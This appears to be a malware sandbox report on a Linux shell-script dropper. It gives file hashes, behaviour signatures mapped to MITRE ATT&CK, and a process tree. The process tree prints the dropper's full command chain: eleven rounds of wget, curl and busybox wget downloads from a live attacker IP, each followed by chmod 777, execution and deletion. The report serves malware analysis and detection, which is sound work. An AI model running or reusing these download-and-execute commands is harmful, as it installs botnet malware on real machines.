Analysis
-
max time kernel
27s -
max time network
31s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
20/11/2024, 03:37
Static task
static1
Behavioral task
behavioral1
Sample
dfa5634d6e0864fd75a85f6ca454a6af85668dcad006d58bd01093297c1e3710.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
dfa5634d6e0864fd75a85f6ca454a6af85668dcad006d58bd01093297c1e3710.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
dfa5634d6e0864fd75a85f6ca454a6af85668dcad006d58bd01093297c1e3710.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
dfa5634d6e0864fd75a85f6ca454a6af85668dcad006d58bd01093297c1e3710.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
dfa5634d6e0864fd75a85f6ca454a6af85668dcad006d58bd01093297c1e3710.sh
-
Size
10KB
-
MD5
a66b2b6475f1deadbfec69312a468f63
-
SHA1
311bc6386bc3d2c34ab616940335f8ccaf423dc6
-
SHA256
dfa5634d6e0864fd75a85f6ca454a6af85668dcad006d58bd01093297c1e3710
-
SHA512
7831e8928cba5706bc9a2d21e51d87b6c3de054706c0d9489f8b368bdb219c9422df6b356f343c9dd5aac9b2bed714cb7a7ccfeba0728a4a6c0423efcd853f27
-
SSDEEP
192:m3jbtVeKWq7ksgTXBhhE74o5WRRZlgQUG78EP73j54oy7LvXz3h4oSLvrz3h4o5L:ShU2GbwrOX
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 11 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 772 chmod 745 chmod 671 chmod 683 chmod 690 chmod 696 chmod 706 chmod 718 chmod 732 chmod 756 chmod 785 chmod -
Executes dropped EXE 11 IoCs
ioc pid Process /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok 672 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo 684 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P 691 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw 697 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 707 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 720 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in 734 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR 746 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss 757 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw 774 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE 786 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE -
Checks CPU configuration 1 TTPs 11 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 1 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 788 wget -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR curl File opened for modification /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw curl File opened for modification /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok curl File opened for modification /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw curl File opened for modification /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 curl File opened for modification /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 curl File opened for modification /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in curl File opened for modification /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo curl File opened for modification /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P curl File opened for modification /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss curl File opened for modification /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE curl
Processes
-
/tmp/dfa5634d6e0864fd75a85f6ca454a6af85668dcad006d58bd01093297c1e3710.sh/tmp/dfa5634d6e0864fd75a85f6ca454a6af85668dcad006d58bd01093297c1e3710.sh1⤵PID:644
-
/bin/rm/bin/rm bins.sh2⤵PID:649
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok2⤵PID:654
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:660
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok2⤵PID:669
-
-
/bin/chmodchmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok2⤵
- File and Directory Permissions Modification
PID:671
-
-
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok2⤵
- Executes dropped EXE
PID:672
-
-
/bin/rmrm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok2⤵PID:674
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo2⤵PID:675
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:678
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo2⤵PID:681
-
-
/bin/chmodchmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo2⤵
- File and Directory Permissions Modification
PID:683
-
-
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo2⤵
- Executes dropped EXE
PID:684
-
-
/bin/rmrm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo2⤵PID:685
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P2⤵PID:686
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:688
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P2⤵PID:689
-
-
/bin/chmodchmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P2⤵
- File and Directory Permissions Modification
PID:690
-
-
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P2⤵
- Executes dropped EXE
PID:691
-
-
/bin/rmrm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P2⤵PID:692
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw2⤵PID:693
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:694
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw2⤵PID:695
-
-
/bin/chmodchmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw2⤵
- File and Directory Permissions Modification
PID:696
-
-
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw2⤵
- Executes dropped EXE
PID:697
-
-
/bin/rmrm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw2⤵PID:698
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY52⤵PID:699
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:700
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY52⤵PID:704
-
-
/bin/chmodchmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY52⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY52⤵
- Executes dropped EXE
PID:707
-
-
/bin/rmrm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY52⤵PID:709
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi02⤵PID:710
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:713
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi02⤵PID:717
-
-
/bin/chmodchmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi02⤵
- File and Directory Permissions Modification
PID:718
-
-
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi02⤵
- Executes dropped EXE
PID:720
-
-
/bin/rmrm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi02⤵PID:721
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in2⤵PID:723
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:727
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in2⤵PID:731
-
-
/bin/chmodchmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in2⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR2⤵PID:737
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR2⤵PID:743
-
-
/bin/chmodchmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR2⤵PID:748
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss2⤵PID:749
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss2⤵PID:755
-
-
/bin/chmodchmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss2⤵
- Executes dropped EXE
PID:757
-
-
/bin/rmrm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss2⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw2⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw2⤵PID:771
-
-
/bin/chmodchmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw2⤵PID:775
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE2⤵PID:777
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE2⤵PID:783
-
-
/bin/chmodchmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE2⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE2⤵PID:787
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao2⤵
- System Network Configuration Discovery
PID:788
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97